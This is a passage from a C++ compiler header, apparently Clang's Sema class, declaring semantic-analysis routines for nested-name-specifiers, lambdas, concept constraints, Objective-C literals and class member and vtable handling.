bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case do not emit error message.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool value pointed by this parameter is set to 'true'
/// if the identifier is treated as if it was followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind,
Expr *TrailingRequiresClause);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
/// Create a dummy variable within the declcontext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++2a.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// A diagnostic is emitted if it is not, false is returned, and
/// PossibleNonPrimary will be set to true if the failure might be due to a
/// non-primary expression being used as an atomic constraint.
bool CheckConstraintExpression(const Expr *CE, Token NextToken = Token(),
bool *PossibleNonPrimary = nullptr,
bool IsTrailingRequiresClause = false);
private:
/// Caches pairs of template-like decls whose associated constraints were
/// checked for subsumption and whether or not the first's constraints did in
/// fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
/// Caches the normalized associated constraints of declarations (concepts or
/// constrained declarations). If an error occurred while normalizing the
/// associated constraints of the template or concept, nullptr will be cached
/// here.
llvm::DenseMap<NamedDecl *, NormalizedConstraint *>
NormalizationCache;
llvm::ContextualFoldingSet<ConstraintSatisfaction, const ASTContext &>
SatisfactionCache;
public:
const NormalizedConstraint *
getNormalizedAssociatedConstraints(
NamedDecl *ConstrainedDecl, ArrayRef<const Expr *> AssociatedConstraints);
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained than another declaration's according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives the result of true if D1 is
/// at least constrained than D2, and false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// If D1 was not at least as constrained as D2, but would've been if a pair
/// of atomic constraints involved had been declared in a concept and not
/// repeated in two separate places in code.
/// \returns true if such a diagnostic was emitted, false otherwise.
bool MaybeEmitAmbiguousAtomicConstraintsDiagnostic(NamedDecl *D1,
ArrayRef<const Expr *> AC1, NamedDecl *D2, ArrayRef<const Expr *> AC2);
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param Template the template-like entity that triggered the constraints
/// check (either a concept or a constrained entity).
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(
const NamedDecl *Template, ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange, ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful, emits a diagnostic and returns true if an error
/// occured and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check whether the given function decl's trailing requires clause is
/// satisfied, if any. Returns false and updates Satisfaction with the
/// satisfaction verdict if successful, emits a diagnostic and returns true if
/// an error occured and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckFunctionConstraints(const FunctionDecl *FD,
ConstraintSatisfaction &Satisfaction,
SourceLocation UsageLoc = SourceLocation());
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constrains are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
/// \param First whether this is the first time an unsatisfied constraint is
/// diagnosed for this error.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void DiagnoseRedeclarationConstraintMismatch(SourceLocation Old,
SourceLocation New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. Type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// Mark destructors of virtual bases of this class referenced. In the Itanium
/// C++ ABI, this is done when emitting a destructor for any non-abstract
/// class. In the Microsoft C++ ABI, this is done any time a class's
/// destructor is referenced.
void MarkVirtualBaseDestructorsReferenced(
SourceLocation Location, CXXRecordDecl *ClassDecl,
llvm::SmallPtrSetImpl<const RecordType *> *DirectVirtualBases = nullptr);
/// Do semantic checks to allow the complete destructor variant to be emitted
/// when the destructor is defined in another translation unit. In the Itanium
/// C++ ABI, destructor variants are emitted together. In the MS C++ ABI, they
/// can be emitted in separate TUs. To emit the complete variant, run a subset
/// of the checks performed when emitting a regular destructor.
void CheckCompleteDestructorVariant(SourceLocation CurrentLocation,
CXXDestructorDecl *Dtor);
/// The list of classes whose vtables have been used within
/// this translation unit, and the source locations at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called some point later
/// when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator. \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annoated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// ActOnBaseSpecifier - Parsed a base specifier
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbiguousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the exception
/// spec is a subset of base spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
